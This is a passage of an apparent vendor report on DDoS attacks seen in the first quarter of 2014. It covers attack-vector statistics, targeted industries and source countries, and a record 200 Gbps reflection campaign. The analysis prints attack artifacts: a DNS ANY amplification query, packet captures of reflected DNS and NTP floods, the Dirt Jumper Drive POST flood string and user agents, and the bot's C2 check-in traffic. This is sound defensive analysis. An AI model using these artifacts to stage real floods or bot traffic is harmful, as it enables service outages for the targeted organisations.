Prolexic Quarterly Global DDoS Attack Report

Prolexic Quarterly Global DDoS Attack Report Q1 2014 Malicious actors choose reflection, not infection to launch high-bandwidth attacks www.prolexic.com

Akamai s State of the Internet Report: Gain insight into the critical Internet metrics, events and trends that impact your business online. Download the report and associated infographics at akamai.com/stateoftheinternet. Download the new State of the Internet ios app, now available in the Apple App Store. Akamai is a leading provider of cloud services for delivering, optimizing and securing online content and business applications. At the core of the company s solutions is the Akamai Intelligent Platform providing extensive reach, coupled with unmatched reliability, security, visibility and expertise. Akamai removes the complexities of connecting the increasingly mobile world, supporting 24/7 consumer demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is accelerating the pace of innovation in a hyperconnected world, please visit www.akamai.com or blogs.akamai.com, and follow @Akamai on Twitter.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 3 Letter from the editor As you may be aware, Akamai completed the acquisition of Prolexic, a leader in DDoS mitigation services, in February 2014. Prolexic s Global DDoS Attack Report and Akamai s State of the Internet Report both cover DDoS attacks and related trends and statistics. In the coming quarters, we will consolidate these publications with the goal of publishing a combined report that delivers an unparalleled level of insight into the Internet threat landscape. Follow @akamai_soti on Twitter for more information.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 4 Table of contents Analysis and emerging trends...5 Compared to Q1 2013...6 Compared to Q4 2013...7 Total attack vectors...7 Infrastructure layer attacks...8 Application layer attacks...8 Comparison: Attack vectors (Q1 2014, Q4 2013, Q1 2013)...9 Target industries...11 Media and entertainment...11 Software and technology...11 Security...11 Financial services...11 Gaming...12 Summary...12 Top 10 source countries...13 Comparison: Top 10 source countries (Q1 2014, Q4 2013, Q1 2013)...14 Total attacks per week (Q1 2014 vs. Q1 2013)...16 Comparison: Attack campaign start time per day (Q1 2014, Q4 2013, Q1 2013)...17 Attack spotlight: Q1 s record-setting DDoS attack...18 Overview...18 Validated attack vectors used in this campaign...19 DNS amplification...20 NTP monlist reflection...21 POST flood...21 Analysis of associated malware...21 Visualization of sourced traffic...26 Source countries of the DNS reflection attacks...26 Source countries for the NTP reflection attacks...27 Source countries for POST attacks from the Drive toolkit...28 Case study: A reflected application DDoS attack...29 Overview...29 Characteristics of the WordPress DDoS pingback application reflection attack...29 Highlighted campaigns...31 Campaign A (Internet media company)...31 Campaign B (A Prolexic/Akamai site)...33 Recommended detection rules...34 Conclusion...34 Looking forward...35 About Prolexic Security Engineering & Response Team (PLXsert)...36 About Prolexic...36

Prolexic Quarterly Global DDoS Attack Report Q1 2014 5 At a glance Compared to Q1 2013 47% increase in total DDoS attacks 9% decrease in average attack bandwidth 68% increase in infrastructure (Layer 3 & 4) attacks 21% decrease in application (Layer 7) attacks 50% decrease in average attack duration: 35 vs. 17 hours 133% increase in average peak bandwidth Compared to Q4 2013 18% increase in total DDoS attacks 39% increase in average attack bandwidth 35% increase in infrastructure (Layer 3 & 4) attacks 36% decrease in application (Layer 7) attacks 24% decrease in average attack duration: 23 vs. 17 hours 114% increase in average peak bandwidth Analysis and emerging trends Q1 2014 continued the trend of increasing botnet construction and decreasing traditional malware infection. This is a result of the widespread availability of reflection-based distributed denialof-service (DDoS) toolkits for malicious actors to build and deploy botnets for DDoS attacks. Crime ware toolkits that use reflection and amplification techniques to abuse Internet protocols allow malicious actors to launch massive attacks by using vulnerable servers and devices without the traditional need for malware infection. Since 2013, attackers have been abusing communication protocols such as Character Generator (CHARGEN), Network Time Protocol (NTP) and Domain Name System (DNS). These are all based on the User Datagram Protocol (UDP) which indirectly allows attackers to conceal their identities via address spoofing so they are not immediately identified as the source of an attack. Attackers send small request packets to intermediary victim servers, and those servers in turn respond to the attacker s intended target. The availability of these vulnerable protocols, which are often enabled by default in server software, make the Internet a ready-to-use botnet of potential victim devices that can be exploited by malicious actors to launch huge attacks. In Q1, malicious attackers delivered attacks more frequently and at higher packet per second rates than in the previous quarter. This quarter saw a 39 percent increase in average bandwidth. What s more, the largest-ever DDoS attack to cross the Prolexic (now part of Akamai) DDoS mitigation network occurred during this quarter. The attack used a combination of reflection techniques to target the infrastructure along with a traditional botnet-based application attack. The attack, which exceeded 10 hours in length, peaked at more than 200 Gbps (gigabits per second) and 53.5 Mpps (million packets per second). The larger than average Q1 attack bandwidth rates were correlated with a significant trend toward volumetric, infrastructure-based attacks, a type of attack that seeks to consume as much bandwidth as possible. There was a corresponding reduction in the use of application-layer attacks. This trend echoes the availability of DDoS tools that are designed to use infrastructure attacks. Innovation in the DDoS marketplace is resulting in tools that inflict more damage with fewer resources. Q1 s high-volume attacks were made possible by the availability of easy-to-use DDoS tools from the DDoS-as-a-Service marketplace. These tools can be used with minimal skill on the part of the attacker. Application-layer attacks, which were less popular this quarter, typically require greater skill and coordination by attackers.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 6 In Q1, NTP reflection attacks surged, likely due to the availability of DDoS attack tools that use this reflection technique. In this quarter, the NTP flood method went from accounting for less than 1 percent of all attacks in the prior quarter to reach nearly the same popularity as SYN flood attacks. In Q1 2013, neither CHARGEN nor NTP attack vectors were observed. In Q1 2014, however, these two attack vectors accounted for 23 percent of all infrastructure attacks mitigated by Prolexic. The Media and Entertainment industry was the most frequently targeted industry in Q1. This industry received large portions of NTP reflection attack traffic and application-based attacks, including GET floods. Moreover, the Media and Entertainment vertical was targeted by 54 percent of the malicious packets mitigated by Prolexic during active DDoS attacks in Q1. A large amount of malicious activity continued to come from Asian countries in Q1, six of which appear in the Top 10 source countries. They accounted for 60 percent of attacks. Compared to Q1 2013 Compared to the same quarter one year ago, the total number of DDoS attacks increased 47 percent. This increase occurred despite a 21 percent drop in application-layer attacks, marking a continuing shift towards infrastructurebased methods. Some of the increase in infrastructure attacks can be attributed to the emergence of CHARGEN and NTP reflection attack vectors, neither of which was observed in Q1 2013. These two attack vectors alone accounted for 23 percent of the infrastructure attacks mitigated by Prolexic in Q1 2014. Figure 1: Peak bandwidth average (Q1 2014, Q4 2013, Q1 2013) Average attack duration decreased this quarter compared with Q1 2013, dropping to 17 hours versus 35 hours. Average bandwidth dropped 9 percent in Q1 2014 compared to a year earlier while packets per second (pps) increased 24 percent. In short, Q1 2014 DDoS attack campaigns were as disruptive as those from the previous year. The major difference was the attack execution style: malicious actors delivered more frequent DDoS attacks with higher packet per second rates than a year ago. Despite lower average bandwidths than in Q1 2013, Q1 2014 attacks also saw the largest peak attack rates (bps) to date.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 7 Compared to Q4 2013 Figure 2: Peak packets per second (Q1 2014, Q4 2013, Q1 2013) frequent DDoS attacks, along with an uptick in infrastructure-based attacks. Prolexic observed an 18 percent increase in total attacks in Q1 2014 compared to the prior quarter. The number of infrastructure attacks increased 35 percent, a rise led by a significant increase in the use of the NTP flood attack. NTP floods were starting to surge at the end of Q4. This trend continued through Q1, making NTP one of the more popular attack types this quarter. Comprising almost 17 percent of the attacks mitigated, the NTP flood method reached nearly the same level of usage as the SYN flood. Another notable change this quarter was a 39 percent increase in average bandwidth. This statistic was highlighted by the largest-ever DDoS attack mitigated by Prolexic, which occurred this quarter and exceeded 200 Gbps. This quarter saw the continuation of more Total attack vectors In the first quarter of the year, infrastructure layer attacks took a more dominant position over application layer attacks, a change from the recent historical trend and an increase of 11 percent over the prior quarter. Infrastructure-layer attack vectors represented 87 percent of the attacks, while application layer attack vectors represented only 13 percent. This trend echoes the increased availability and convenience of DDoS attack tools and DDoS-for-hire sites that use infrastructure-based attack methods. In addition, malicious actors are increasingly using DDoS attacks that rely on high bandwidth saturation, by leveraging the amplification factor available by using reflection tactics. Another contributing factor is their ability to launch DDoS attacks without the need for malware infection. Instead, they are leveraging the Internet as a ready-to-use botnet and victimizing legitimate network devices via common Internet protocols.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 8 Figure 3: DDoS attack vectors and their relative distribution in Q1 2014 Infrastructure layer attacks Infrastructure-based attacks, also known as volumetric attacks, seek to consume as much bandwidth as possible. These attacks target the network infrastructure and are the attack vectors preferred by today s malicious actors. The Internet is replete with misconfigured and open servers that are vulnerable to protocol abuse. Character Generator (CHARGEN), Network Time Protocol (NTP) and Domain Name System (DNS) are three protocols commonly abused, as observed by PLXsert. The frequency of such protocol abuse in DDoS campaigns is usually driven by the appearance of new tools that can produce more effective attacks. Prolexic noticed an 11 percent increase in infrastructure-based attacks this quarter compared to last quarter, and a similar increase of 11 percent in comparison to the same quarter a year earlier. In addition, there is a noticeable difference in the types of infrastructure attacks employed in Q1 2014. This included a surge in the number of NTP-based attacks to 17 percent and a decrease in SYN floods to 18 percent. Other protocol-based attacks included UDP floods at 10 percent, ICMP at 10 percent, DNS at 9 percent, and CHARGEN at 3 percent. Application layer attacks Application layer attacks require a higher level of knowledge and sophistication to execute than infrastructure attacks. They are directed at applications (layer 7) such as the Hypertext Transfer Protocol (HTTP) and are not necessarily focused on bandwidth consumption. Unlike volumetric attacks, they seek to cause specific application to fail or to become unresponsive to legitimate users.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 9 For example, an outage can be caused by a surge in simultaneous connection attempts. It is important to note application protocols such as HTTP are allowed to pass through many traffic inspection and firewall devices. These DDoS attacks often mimic legitimate traffic produced by web applications, which makes them more difficult to detect before they reach full force. Encrypted SSL attacks add another level of difficulty for DDoS mitigation, requiring the allocation of additional controls and resources. PLXsert analyzed the use of an application attack involving reflection techniques in which malicious actors were able to abuse features of a web framework suite, specifically WordPress, to cause a massive number of requests to overwhelm a targeted website (see Case study: A reflected application DDoS attack later in this document). In recent quarters, PLXsert observed a trend where application-based DDoS attacks were gaining ground and being used in greater numbers by malicious actors, topping 20 percent of the total attacks in observed campaigns. The number of observed application-based attacks in this quarter, however, differed markedly from recent quarters. Application layer attacks showed a decrease this quarter, accounting for only 13 percent of observed attacks. HTTP GET floods were the dominant application layer attack at 9 percent, followed by HTTP POST floods at 2 percent, HEAD floods at 0.4 percent, PUSH floods at 0.3 percent, SSL GET floods at 0.1 percent and SSL POST floods at 0.1 percent. Comparison: Attack vectors (Q1 2014, Q4 2013, Q1 2013) Significant differences were observed between Q1 2013, Q4 2013 and this quarter. The first difference was a decline in the use of application attack vectors in the first quarter of 2014 (13 percent of the total) in comparison to the first quarter of 2013 (23 percent) for a decrease of almost 11 percent. The drop is also observable when comparing Q1 2014 to the fourth quarter of 2013 (23 percent), a decrease of 10 percent. This quarter s numbers break a trend observed since 2012 of a sustained increase in the use of applicationlayer vectors compared to the use of infrastructure-layer vectors. Using an application-layer attack vector usually requires a higher degree of skill, as well as more significant effort to build a botnet and coordinate the attack (as was seen with the itsoknoproblembro attacks). Such application attack campaigns started to wane since the end of the third quarter of 2013. Since then, Prolexic has not observed any campaigns using the application-layer attack vector with as much effectiveness, power and duration as the itsoknoproblembro campaigns. However, this could change. For example, a modified brobot botnet could reappear and be used with high frequency against specific industries. A difference in the use of application-based vectors can also be observed in the use of HTTP GET floods, which were the most common application attack vector in Q1 2013 (19 percent of all attacks) and Q4 2013 (20 percent of all attacks), but only represented 9 percent of all attacks in Q1 2014 a significant drop. These numbers point to a preference by malicious actors in Q1 2014 for the use of infrastructure-based attack vectors. This is possibly driven by the availability of new tools that facilitate infrastructure DDoS attacks using protocols and services susceptible to reflection and amplification, such as NTP and DNS, along with the availability of open or misconfigured DNS and NTP servers on the Internet. There was an overall decrease in application-based attacks of more than 12 points in comparison to Q4 2013 (23 percent) and Q1 2013 (23 percent). The data also show NTP was the most frequently used infrastructure-based amplification attack at 17 percent, followed by DNS at 9 percent and CHARGEN at 3 percent, in contrast with last quarter when DNS was in first place with 10 percent, followed by CHARGEN at 6 percent, and NTP at 0.3 percent.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 10 Figure 4: Attack vectors in Q1 2014, Q4 2013, Q1 2013

Prolexic Quarterly Global DDoS Attack Report Q1 2014 11 Target industries Prolexic has introduced a new metric to the DDoS Global Attack Report to provide insight into the industries targeted by malicious actors in DDoS campaigns. Media and Entertainment took the brunt of DDoS attacks, accounting for 50 percent of the attack targets in Q1. Software and Technology was the second most often hit at 17 percent. Security accounted for 12 percent of attacks. Finance was targeted 9 percent of the time. Gaming was the last of the top five industry targets with 7 percent of all observed attacks. Media and entertainment The Media and Entertainment industry accounted for a majority of the attacks against Prolexic customers. This fact provides insight into the motivations of attackers. Attacks against the Media and Entertainment vertical offer several perks for malicious actors, including press coverage and high visibility, benefits that may influence their choice of target. High visibility allows campaign organizers to more effectively reach out to supporters and recruit others to join their cause. The Media and Entertainment industry experienced some of the highest volume attacks from both application and infrastructure attack vectors. Forty-two percent of all NTP reflection and amplification attacks in Q1 targeted Media and Entertainment. Prolexic continues to see a major interest by attackers in targeting the Media and Entertainment industry to spread fear and propaganda through political or socially motivated DDoS campaigns. The Media and Entertainment industry was targeted with 54 percent of the malicious packets consumed by Prolexic during active DDoS attacks. Software and technology The Software and Technology industry includes companies that provide solutions such as Software as a Service (SaaS) and other cloud-based technologies. This industry was hit with the second greatest number of attacks, accounting for 17 percent. The Software and Technology industry was mainly targeted by infrastructure-layer attacks. The most popular attack vectors against this industry were DNS and NTP reflection and amplification attacks. Software and Technology was the target of these types of attacks 23 and 22 percent of the time, respectively. Security The Security vertical includes companies that provide security-based solutions, such as Prolexic. This industry faced 12 percent of all DDoS attacks. The motive behind attacks against the Security vertical is to take down a critical service that leaves a customer susceptible to other attacks. The Security industry also sees a high amount of infrastructure-based attacks, accounting for 12 percent of all NTP attacks, 8 percent of all DNS attacks and 6 percent of all CHARGEN attacks. Financial services The Financial Services industry includes major financial institutions, such as banks and trading platforms. It was targeted in 9 percent of total attacks in the first quarter. Financial institutions have been the target of many organized attacks, such as those orchestrated by organized cyber-crime group Izz ad-din al-qassam Cyber Fighters (QCF) using itsoknoproblembro. Fortunately, the Financial industry did not experience many major campaigns this quarter.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 12 A quiet quarter does not necessarily reflect a diminished interest by attackers against this industry. Infrastructure-layer attacks pose the greatest threat to this industry due to the importance of the alwayson services they provide. Recently, there have been indicators that suggest major campaigns against the financial vertical could resume. Malicious actors may be pursuing more refined methodologies and information-gathering tools to introduce new attack vectors against this vertical. Gaming The Gaming industry includes any company related to online gaming or gaming-related content. Gaming was the fifth most-targeted industry, accounting for 7 percent of total attacks. Attacks against the Gaming industry are frequently motivated by players seeking to gain a competitive advantage. The Gaming industry receives mostly application-layer attacks; 13 percent of GET floods and 23 percent of POST floods targeted Gaming in Q1. Summary The data discussed represents only a portion of active DDoS attack campaigns that occurred in this quarter against the named industries. Prolexic will continue to analyze and take the necessary measures to provide real-time insight into DDoS attacks against specific verticals. Figure 5: Distribution of attacks targeting key industries

Prolexic Quarterly Global DDoS Attack Report Q1 2014 13 Top 10 source countries The pie chart shown in Figure 6 represents the Top 10 sources of malicious, non-spoofed DDoS traffic in Q1. The United States was the main source of DDoS attacks in Q1 2014, accounting for 21 percent of attacks. China took second place at 18 percent, relinquishing its spot as the number one source of DDoS attacks for the second quarter in a row. Thailand retained its spot in third place, accounting for 15 percent of attacks. Making a debut in the fourth place spot, Turkey accounted for 13 percent. Germany came in fifth at 8 percent to round off the top five source countries of malicious DDoS traffic. The remainder of the top 10 includes Brazil (6 percent), Italy (5 percent), Indonesia (5 percent), South Korea (5 percent) and Saudi Arabia (4 percent). There was a noticeable presence of Asian countries in the top 10 source countries. Growing economies and an expanding IT infrastructure, plus large online populations, fuel DDoS attack campaigns. There were also indicators of an increasing amount of hacktivist group activity from Asia. Social and political issues are also known to play major roles in certain countries presence on the Top 10 source list, such as Turkey. Figure 6: Top 10 source countries for non-spoofed DDoS attacks in Q1 2014

Prolexic Quarterly Global DDoS Attack Report Q1 2014 14 Comparison: Top 10 source countries (Q1 2014, Q4 2013, Q1 2013) A look at the source countries from the most recent quarter, as well as Q4 2013 and Q1 2013, illustrates how country rankings in the top 10 fluctuate as new vulnerabilities arise, attack agendas vary, malicious actors change, and existing attacks shift due to DDoS toolkit economics. There was only a slight decrease in the percentage of attacks originating from the United States (21 percent) from Q1 compared to the previous quarter (24 percent), and a decrease of 1 percent from Q1 2013 (22 percent). The United States continues to top China as the main source of DDoS attacks. China (18 percent) retained its spot in second place this quarter, despite a decrease of 1 percent from last quarter (19 percent) and a 23 percent decrease from Q1 2013 when China was responsible for almost half of all attacks. Malicious traffic from Turkey (13 percent) surged in Q1, resulting in the country taking the number four spot with an increase of 7 percent from last quarter (6 percent). Looking at data from the three individual quarters reveals that Asian countries have continually dominated the top 10. In Q1, Asian countries accounted for 60 percent of attacks among the Top 10, with six Asian countries making the list. Last quarter, Asian countries accounted for 57 percent of the attacks from the top 10, again with six Asian countries making the list. A year ago, Asian countries accounted for 54 percent of attacks from the top 10 list with four Asian countries making the list. While several of the Asian countries have rotated on and off the list, in every quarter an Asian country has ranked either first or second among the top producers of DDoS attacks.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 15 Figure 7: Top 10 source countries for non-spoofed DDoS attacks in Q1 2014, Q4 2013, Q1 2013

Prolexic Quarterly Global DDoS Attack Report Q1 2014 16 Total attacks per week (Q1 2014 vs. Q1 2013) As seen in the chart below, Q1 2014 had a peak in total attacks from February 12-18, a week that showed a 191 percent increase in DDoS attacks as compared to the same week in Q1 2013. This surge was due to the increase in CHARGEN and NTP reflection attacks. The highest volume of DDoS attacks per week in Q1 was 47 percent greater than the highest volume of attacks registered in any week in Q1 2013. Although the quarter marked a 21 percent reduction in application attacks, overall there was a 47 percent increase in total attacks. This rise was attributed to a 68 percent increase in total infrastructure attacks compared to Q1 2013. Figure 8: Changes in DDoS attacks per week Q1 2014 vs. Q1 2013

Prolexic Quarterly Global DDoS Attack Report Q1 2014 17 Comparison: Attack campaign start time per day (Q1 2014, Q4 2013, Q1 2013) In Q1, a shift occurred in the time of day that DDoS attacks took place. In Q4 2013 and Q1 2013 the majority of attacks occurred around 20:00 GMT (12 p.m. PST and 3 p.m. EST) while attacks in Q1 2014 peaked around 12:00 GMT (4 a.m. PST and 7 a.m. EST). Q1 2014 continued to see similar timeframes with the highest attack rates taking place between 11:00 GMT (3 a.m. PST and 6 a.m. EST) and 14:00 GMT. One conclusion that may be drawn from this change in attack timing is the introduction of new attack campaigns and political and social influences that may motivate certain organizations or individuals to participate in a DDoS attack. Figure 9 outlines the distribution of attack start times in three quarters. The data indicate a shift in the time of day that the majority of DDoS attacks took place in Q1 2014 versus Q4 2013 and Q1 2013. Figure 9: Attack campaign start time Q1 2014, Q4 2013, Q1 2013

Prolexic Quarterly Global DDoS Attack Report Q1 2014 18 Attack spotlight: Q1 s record-setting DDoS attack Campaign included NTP, DNS reflection techniques as well as Dirt Jumper botnet Overview In Q1 2014, Prolexic successfully mitigated its largest confirmed DDoS attack campaign against a Prolexic customer. The malicious actors used a powerful combination of Network Time Protocol (NTP) reflection and Domain Name System (DNS) reflection as the main attack vectors, which also included variations of the POST flood attack, a Layer 7 application attack vector. The attack exceeded 10 hours in duration and was directed at a European Internet media company. PLXsert successfully identified the tools used in the campaign. These tools included the latest NTP and DNS reflection attack tools, as well as a popular DDoS toolkit known as Drive, which is a Dirt Jumper variant that utilizes a traditional botnet architecture achieved through malware infection. As described in PLXsert threat advisories and a series of Distributed Reflection Denial of Service (DrDoS) white papers, the NTP and DNS protocols are susceptible to abuse by malicious actors. By abusing features of the protocols, attackers produce amplified responses much larger packet sizes than the originating requests. In addition, these two protocols are based on User Datagram Protocol (UDP), which makes them susceptible to spoofing, allowing attackers to hide the source of the requests. Using these amplification and reflection techniques, this campaign peaked at 200 Gbps (gigabits per second) and 53.5 Mpps (million packets per second). The list in Figure 10 shows peak malicious traffic rates at each of the five Prolexic scrubbing centers that routed traffic for DDoS mitigation during the attack campaign: San Jose London Hong Kong Washington, DC Frankfurt Peak bits per second (bps) Peak packets per second (pps) 11 Gbps 50 Gbps 18 Gbps 30 Gbps 100 Gbps 3 Mpps 10 Mpps 5.5 Mpps 8 Mpps 27 Mpps Figure 10: Attack metrics for traffic routed through each of five scrubbing centers during this attack campaign As shown in Figure 11, the majority of attack traffic traversed Prolexic s European scrubbing centers in Frankfurt and London.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 19 Figure 11: Attack bandwidth distribution per scrubbing center Figure 12 displays an aggregated view of the progression of attack traffic over time and the subsequent DDoS mitigation at the border in packets per second (pps). Figure 12: Attack and mitigation timeline in packets per second (pps) Validated attack vectors used in this campaign Malicious actors typically mix and match attack vectors to inflict the greatest possible damage on their targets. The particular mix of attack vectors in this campaign was dangerous.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 20 The effectiveness of DDoS strategies is determined not only by the tools used but also by the attack operation. Attackers may switch attack vectors and malicious signature payloads in an effort to bypass automated DDoS mitigation. In the most effective campaigns, attackers will preemptively study, footprint and identify default mitigation procedures in available commercial mitigation technologies. The effectiveness of DDoS strategies is determined not only by the tools used but also by the attack operation. Attackers may switch attack vectors and malicious signature payloads in an effort to bypass automated DDoS mitigation. In the most effective campaigns, attackers will preemptively study, footprint and identify default mitigation procedures in available commercial mitigation technologies. Three main attack vectors were observed in this campaign: DNS reflection, which targets Layer 3 and Layer 4 NTP monlist reflection, which targets Layer 3 and Layer 4 Drive POST1 and POST2 floods, which target Layer 7 DNS amplification A DNS ANY request flood was detected during the campaign. A sample of the request executed via the domain information groper (dig) command is shown in Figure 13. The ANY request results in a 4,112-byte response. Figure 14 shows the payload. $ dig www.xxxxxx.xxx ANY ;; Truncated, retrying in TCP mode. ; <<>> DiG 9.8.5-P1 <<>> www.xxxxxx.xxx ANY ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47503 ;; flags: qr rd ra; QUERY: 1, ANSWER: 255, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ; www.xxxxxx.xxx. IN ANY ;; ANSWER SECTION: www.xxxxxx.xxx. 600 IN A xxx.xxx.xxx.xxx www.xxxxxx.xxx. 600 IN A xxx.xxx.xxx.xxx <snip> ;; MSG SIZE rcvd: 4112 Figure 13: An example ANY request for the domain involved in the attack (domain name not shown). Responses contained 255 A records.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 21 16:39:51.849412 IP 74.208.111.18.53 > x.x.x.x.53: 3573 247/0/1 A 119.148.157.170, A 119.148.156.194, A 119.148.157.247, A 119.148.157.153, A 119.148.156.150, A 119.148.156.185, A 119.148.157.188, A 119.148.157.176, A 119.148.156.183, A 119.148.157.212, A 119.148.157.112, A 119.148.157.171, A 119.148.157.246, A 119.148.156.170, A 119.148.156.147, A 119.148.157.145, A 119.148.157.225, A 119.148.156.171, A 119.148.157.157, A 119.148.157.235, A 119.148.157.245, A 119.148.157.223, A 119.148.157.116, A 119.148.157.187, A 119.148.157.120, A 119.148.156.168, A 119.148.157.113, A 119.148.157.239, A 119.148.156.128, A 119.148.156.117, A 119.148.157.227, A 119.148.157.233, A 119.148.156.177, A 119.148.157.163, A 119.148.157.142, A 119.148.156.163, A 119.148.157.184, A 119.148.157.237, A 119.148.157.208, A 119.148.157.240, A 119.148.157.203, A 119.148.157.127, A 119.148.156.181, A 119.148.156.196, A 119.148.157.172, A 119.148.156.193, A 119.148.157.209, A 119.148.157.100, A 119.148.157.134, A 119.148.156.184, A 119.148.156.172, A 119.148.156.189, A 119.148.157.133, A 119.148.157.146, A 119.148.156.155, A 119.148.157.250, A 119.148.157.174, A 119.148.157.151, A 119.148.157.154, A 119.148.157.221, A 119.148.157.167, A 119.148.156.159, A 119.148.156.143, A 119.148.157.244, A 119.148.157.211, A 119.148.156.160, A 119.148.156.120, A 119.148.156.107, A 119.148.156.134, A 119.148.157.160, A 119.148.156.109, A 119.148.157.202, A 119.148.156.158, A 119.148.157.179, A 119.148.156.156, A 119.148.156.122, A 119.148.157.128, A 119.148.156.136, A 119.148.156.199, A 119.148.156.108, A 119.148.156.192, A 119.148.156.116, A 119.148.156.179, A 119.148.157.101, A 119.148.157.229, A 119.148.157.131, A 119.148.157.143, A 119.148.157.194, A[ domain] Figure 14: The payload for the DNS ANY query flood NTP monlist reflection An NTP reflection attack signature was also observed during the campaign, as shown in Figure 6. 13:52:49.995333 IP 66.172.249.12.123 > x.x.x.x.19276: NTPv2, Reserved, length 440 13:52:49.995370 IP 212.7.200.120.123 > x.x.x.x.13520: NTPv2, Reserved, length 440 13:52:49.995375 IP 212.7.200.120.123 > x.x.x.x.13520: NTPv2, Reserved, length 440 13:52:49.995378 IP 212.7.200.120.123 > x.x.x.x.13520: NTPv2, Reserved, length 440 13:52:49.995405 IP 192.96.205.187.123 > x.x.x.x.54159: NTPv2, Reserved, length 440 13:52:49.995412 IP 192.96.205.187.123 > x.x.x.x.54159: NTPv2, Reserved, length 440 13:52:49.995416 IP 192.96.205.187.123 > x.x.x.x.54159: NTPv2, Reserved, length 440 Figure 15: NTP reflection attack signature POST flood An application layer attack (Layer 7) was observed. This attack generated multiple HTTP (POST) requests with several different signatures in an attempt to bypass DDoS mitigation technologies. PLXsert identified packet signatures that have been associated with the Drive DDoS malware kit. Analysis of associated malware The POST flood Layer 7 attacks witnessed during this campaign all seem to match those generated by the Dirt Jumper Drive malware. A drive binary potentially associated with the attack was analyzed by PLXsert and is shown in Figure 16.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 22 d1e499f1f8253af19b13391122753571 (Dirt Jumper Drive) Figure 16: The MD5# Drive binary variant The Dirt Jumper Drive malware has undergone several iterations since its inception in the underground. Some of the features added to later editions include a -smart command, and more recently, a revamped authentication parameter and command and control (CC or C2) architecture. The binary associated with this campaign, however, included none of the additions of the newer variants. This leads PLXsert to conclude that the first iterations of the toolkit are still being used for large-scale attacks, such as the one highlighted here. The behavior of the Drive binary, which is common to all its known variants, drops a payload to the Windows system directory and executes it as a Windows Service process. Once a successful connection with the C2 has been established, the malware will await for commands from the C2. The variant associated with this campaign supports the following nine attack vectors: GET POST1 POST2 IP IP2 UDP request timeout thread During this campaign, the POST flood attacks may have been the only commands issued to the infected hosts. The POST floods used a hardcoded string that is populated by the malware during runtime to flood its target. The signature of the POST flood can be seen inside of the malware toolkit, as shown in Figure 17: login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_ username=[50]&vb_login_md5password=[50] Figure 17: A POST flood signature observed in this campaign

Prolexic Quarterly Global DDoS Attack Report Q1 2014 23 The Drive DDoS malware toolkit uses randomization features when creating its user agent headers in order to make DDoS mitigation more difficult. In this particular binary, PLXsert identified five different user agents being used, with other randomized components added dynamically to the string (Figure 18): ASCII Mozilla/5.0 (Windows NT ASCII.1 ASCII ; rv: ASCII.0) Gecko/20100101 Firefox/ ASCII.0 ASCII Opera/9.80 (Windows NT ASCII.1 ASCII ; U; Edition ASCII Local; ru) Presto/2.10.289 Version/ ASCII.0 ASCII Mozilla/4.0 (compatible; MSIE 8.0; Windows NT ASCII.1 ASCII ; Trident/4.0; SLCC2;.NET CLR 2.0. ASCII ;.NET CLR 3.5. ASCII ;.NET CLR 3.0. Figure 18: Example user agents identified during this campaign Random country strings may also be added to the user agent header. Those shown in Figure 19 were extracted from the malware toolkit s memory. ASCII Bangladesh ASCII Russia ASCII United Kingdom ASCII Egypt ASCII China ASCII Iran ASCII Mongolia ASCII India ASCII Grenada ASCII Thailand ASCII Romania ASCII Germany ASCII France ASCII Ukraine ASCII United States Figure 19: Country strings options A full dump of the network traffic is shown in Figure 20 to illustrate the connection process between the bot and C2. Once an attack command is received, the bot commences the POST flood, as shown in Figure 22. The k parameter is an identifier of the Drive toolkit making connection attempts to its C2. This parameter identifies the bot to the C2 during authentication.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 24 CONNECT TO C2 POST /drv/ HTTP/1.1 Host: xxxxxxx.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.010652;.NET CLR 3.5.010652;.NET CLR 3.0.010652 Accept: text/html Connection: Keep-Alive Content-Length: 17 Content-Type: application/x-www-form-urlencoded k=kpy3er8zr51ov04 <-K parameter necessary for bot identification in Dirt Jumper Drive ATTACK POST HTTP/1.1 Host: xxxx User-Agent: Opera/9.80 (Windows NT 5.1; WOW64; U; Edition Thailand Local; ru) Presto/2.10.289 Version/10.05 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Connection: Keep-Alive Referer: http://xxxx Content-Length: 2443 Content-Type: application/x-www-form-urlencoded Figure 20: C2 instructions to infected bots, including the k parameter common to the Drive DDoS toolkit...5..p]...b...p...xh..post HTTP/1.1 Host: /victim User-Agent: Opera/9.80 (Windows NT 5.1; U; Edition Germany Local; ru) Presto/2.10.289 Version/5.03 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Connection: Keep-Alive Referer: http://victim Content-Length: 2443.e..E...@.2....dd.P...H.`.....~..Q..POST HTTP/1.1 Host: victim User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition United States Local; ru) Presto/2.10.289 Version/7.08 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Connection: Keep-Alive Referer: http://victim Content-Length: 2443 continued on next page>

